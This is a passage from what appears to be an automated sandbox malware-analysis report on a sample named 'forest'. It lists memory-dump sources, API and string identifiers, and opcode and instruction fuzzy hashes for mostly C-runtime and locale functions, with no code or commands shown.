    • Instruction Fuzzy Hash: 47115E32A18B4297F748AB2AD6553B9B3A4FF44744F884135C64D82AA4EF7DF0B4C720
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _isindst$_get_daylight_invalid_parameter_noinfo
    • String ID:
    • API String ID: 2079693926-0
    • Opcode ID: 024d7a2fbe3fa35e71b706349b584e453a738bf18d77ff34baa4f6ded577213b
    • Instruction ID: 46ec9f9737d8f19f9fe2ef5a4817e24936ce1056ec71c559013cb940837af7de
    • Opcode Fuzzy Hash: 024d7a2fbe3fa35e71b706349b584e453a738bf18d77ff34baa4f6ded577213b
    • Instruction Fuzzy Hash: E281FCB2F047864BDB5C9F28C9413BCA791EB58788F489135DA0E8A799EF3CE541C710
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ef44f5b996b0a4c97cd421fa2f7b2eec2c956ec4453700ee090a862ad28ef570
    • Instruction ID: eaf851445ac40d10b8f44e455573083c0f07b0e53533e403074b61bd90d179dd
    • Opcode Fuzzy Hash: ef44f5b996b0a4c97cd421fa2f7b2eec2c956ec4453700ee090a862ad28ef570
    • Instruction Fuzzy Hash: B552D562A1CB8A86EB58EF2DD4445BDB760FB44B88F884132EA5D077A6DF3DD584C310
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 45e0ad59e8c9e26bcd656274253aea465c3f9b5a8b3e1938740b34708a10c824
    • Instruction ID: 65f99d6dd6519c4f8932ca46e73e5d13405275b50aae9f633fc641159f9f5913
    • Opcode Fuzzy Hash: 45e0ad59e8c9e26bcd656274253aea465c3f9b5a8b3e1938740b34708a10c824
    • Instruction Fuzzy Hash: A552C462A18B8A85EB18DF2DD4545BDB771FB44B88F884132EA4D077A6EF3DD588C310
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
    • String ID:
    • API String ID: 1791019856-0
    • Opcode ID: 4a924499565e78b2eedae9074ba0ffd3eef151bd1f657bf5a64fceeded55bbbd
    • Instruction ID: 4d319c122d0d48d4c6f58e3cfc811a493fade581bc6e2ffa9fbd26cd6cb19d2e
    • Opcode Fuzzy Hash: 4a924499565e78b2eedae9074ba0ffd3eef151bd1f657bf5a64fceeded55bbbd
    • Instruction Fuzzy Hash: 70618732A04B8286E738AF19D540279B3A1FB58745F988135DB9D476E1EF3CEC55CB10
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_
    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
    • API String ID: 593203224-1108341528
    • Opcode ID: 4bff4011c69dc2bffa4ca5d965b1aff102f176220c1171cf0afa2514a101b1f7
    • Instruction ID: c2eab13a3505bef072743166b46f9a4918a7201d4bd8341d7bac4bc12889e36a
    • Opcode Fuzzy Hash: 4bff4011c69dc2bffa4ca5d965b1aff102f176220c1171cf0afa2514a101b1f7
    • Instruction Fuzzy Hash: 15F29026A09B8689EB589F1DD15027DF760FF51B84BD89032DA4E077B1CF2EE865D320
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_
    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
    • API String ID: 593203224-1108341528
    • Opcode ID: 4d51fc69ed0aefbb7a54308f17d5018c06b0431565279e3e57718adadde6371e
    • Instruction ID: be93c133e2e1fdecbbbf4e865d4721ff8b57e995dbb72ef93e8b4843f0ceb17a
    • Opcode Fuzzy Hash: 4d51fc69ed0aefbb7a54308f17d5018c06b0431565279e3e57718adadde6371e
    • Instruction Fuzzy Hash: 9BF28D26A19B8689EB58AF1DD15027DF760FF51B84BD89031DA4E077A1CF2FE865C320
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_
    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
    • API String ID: 593203224-1108341528
    • Opcode ID: c421abd8b1227590fafa7866595071cb9ef304930f6dcaa7988eefdff358e5b6
    • Instruction ID: 0259c2b5c0800e47c3c65ca7000e47906544530da85795f50f9ec3e36815e4ba
    • Opcode Fuzzy Hash: c421abd8b1227590fafa7866595071cb9ef304930f6dcaa7988eefdff358e5b6
    • Instruction Fuzzy Hash: 77F2A226A09BC689EB19AF2DC15037CF761EB51B88FA88131DA5D077B1DF2ED456C320
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _get_daylight_invalid_parameter_noinfo
    • String ID:
    • API String ID: 474895018-0
    • Opcode ID: 9519d5d6927c0dceee90412c84b97ab75983e3401561576c12abd0c3b33256e1
    • Instruction ID: 70d092bbea1ae740412ea0b408088f2e92f247564b1bbd5cd85bf35ebb5829f3
    • Opcode Fuzzy Hash: 9519d5d6927c0dceee90412c84b97ab75983e3401561576c12abd0c3b33256e1
    • Instruction Fuzzy Hash: 5E92B232E0878A86E728AF28955417EB7A1FB45784F8C4175DB8D07BA5DFBDE901C320
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_
    • String ID: $0123456789-
    • API String ID: 593203224-700845222
    • Opcode ID: 5f4089d0fd42395751be741afa13cdb1a6ac96eb814ed53b1d1bfe63e3708286
    • Instruction ID: db78e3ee7589211962d812fde967ef38bed5c7f1920873aada03b49e0c8e2bfb
    • Opcode Fuzzy Hash: 5f4089d0fd42395751be741afa13cdb1a6ac96eb814ed53b1d1bfe63e3708286
    • Instruction Fuzzy Hash: D1C29022E09B8699EB08AF19C0403BCBB61FB41B98FA84071DA5D477B5DF7DD895C320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID: GetLocaleInfoEx
    • API String ID: 2299586839-2904428671
    • Opcode ID: 45432cefa987a8ddb26bcb9aa938afebbc246bbe92d0c79083534491fcf22730
    • Instruction ID: 7f081f608efa062a98360154b5ac016cf76e92ac237f1d019e887ad793e4a007
    • Opcode Fuzzy Hash: 45432cefa987a8ddb26bcb9aa938afebbc246bbe92d0c79083534491fcf22730
    • Instruction Fuzzy Hash: 02018421B08B8286E718BB5AB4406B6E760AB88BD4F9C4035DF0D43BB5DE3CE5418350
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID:
    • API String ID: 3668304517-0
    • Opcode ID: 7f3d26e1593e39e1a10a5e8ff1769929c7ce844638a16bdf71775aefefaf4499
    • Instruction ID: eb34eafb9aad3fafca730a7f4eae5c6ebb5c325c4e7c19d456ac161581bfd61f
    • Opcode Fuzzy Hash: 7f3d26e1593e39e1a10a5e8ff1769929c7ce844638a16bdf71775aefefaf4499
    • Instruction Fuzzy Hash: CDF11852F18B898AFB189B69D4503FDA361AF447D4F884631ED5C17AEAEE2CD145C320
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ExceptionRaise_clrfp
    • String ID:
    • API String ID: 15204871-0
    • Opcode ID: 39e1f376b379eddbde7b102e04ecedd1f0283ba68647ca32517d18baf4289d42
    • Instruction ID: ecdb8350eab9bef6f6c43036435e7780805041016091a269981af06c310da544
    • Opcode Fuzzy Hash: 39e1f376b379eddbde7b102e04ecedd1f0283ba68647ca32517d18baf4289d42
    • Instruction Fuzzy Hash: B5B15B73A01B858BEB19DF2EC886368B7A0F748B98F588931DA5D877B4CB39D451C710
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorFreeHeapInformationLastTimeZone_get_daylight
    • String ID:
    • API String ID: 3817840142-0
    • Opcode ID: dcf3cfaab941910156589bad44e65512d7baf0601cf28d33dea5fbd4a63b99ea
    • Instruction ID: d3e1b4c271b8de607a0e53480f86aae0d3a9cbc869e8c8959d02532d621c246c
    • Opcode Fuzzy Hash: dcf3cfaab941910156589bad44e65512d7baf0601cf28d33dea5fbd4a63b99ea
    • Instruction Fuzzy Hash: EC412F32A18B4286E718FF39E8915B9F7A0BB48794FC84135EA4D476B5EF3CE4418760
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID: e+000$gfff
    • API String ID: 0-3030954782
    • Opcode ID: 9952dff17a6e0b28f1c47ad7625a1f8cb13026598cfda70a363bfcb1f793575a
    • Instruction ID: cded38b1750412aaa248bbb584c69cf051878a5bbd8783d810b4df0421611dac
    • Opcode Fuzzy Hash: 9952dff17a6e0b28f1c47ad7625a1f8cb13026598cfda70a363bfcb1f793575a
    • Instruction Fuzzy Hash: 9F514662B18BC546E7289F3D9881779FB91E748B94F8CC231CBA887AE5CE3DD4408710
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_
    • String ID: 0123456789ABCDEFabcdef-+Xx
    • API String ID: 593203224-2799312399
    • Opcode ID: ea9d776c45aea9a44ce6d9e28d219698def782b8cb8146fa504f5756bcf6936f
    • Instruction ID: ef061dc25cd382d60c39bbfdfc9f5cb82176f72ae76f435329a5c5262e6980be
    • Opcode Fuzzy Hash: ea9d776c45aea9a44ce6d9e28d219698def782b8cb8146fa504f5756bcf6936f
    • Instruction Fuzzy Hash: DE724D26A09B8A89EB599F2DC05027CF760EB50F88B9C9031DA4E177B5DE3EDC45D360
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_
    • String ID: 0123456789ABCDEFabcdef-+Xx
    • API String ID: 593203224-2799312399
    • Opcode ID: 8b0cf6414e84dd9bcc1a7c0fa230220f4878bfbeb7e5d67c0ba136a9a7323d7c
    • Instruction ID: 520133999af56a68d0e5ce8d22f8324c185004e8f8665971d380d95329485fbc
    • Opcode Fuzzy Hash: 8b0cf6414e84dd9bcc1a7c0fa230220f4878bfbeb7e5d67c0ba136a9a7323d7c
    • Instruction Fuzzy Hash: 8D726122A09BC689EB599F2DC45037CF761AB51F98F988131EA4D177B5CF2ED846C320
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-0
    • Opcode ID: 3c6382313bb41b2851cfb189bd452b790050670863c99794003037fc7f0be717
    • Instruction ID: 9b343ec89507a88c8977c68641e932c53d58ae590f7ba4de11a2a8b923940b55
    • Opcode Fuzzy Hash: 3c6382313bb41b2851cfb189bd452b790050670863c99794003037fc7f0be717
    • Instruction Fuzzy Hash: 5D12DE22A18BC586E755DF2C94417FDB7A4FB58748F899235EB9C426A2EF38E1C0C710
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d8df48cdeadaddc7c14a4e54abbdf2cb8e4430bc0d57ccde1e8657e071e4a5e1
    • Instruction ID: 651be298219a8a0d9998c40b76993e2898010f71bdf9881b47f335e40cb2184d
    • Opcode Fuzzy Hash: d8df48cdeadaddc7c14a4e54abbdf2cb8e4430bc0d57ccde1e8657e071e4a5e1
    • Instruction Fuzzy Hash: 2DE1DF32A04B8186E714EF65E8406FE77A4FB88788F854636DE9D57792EF38D249C310
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
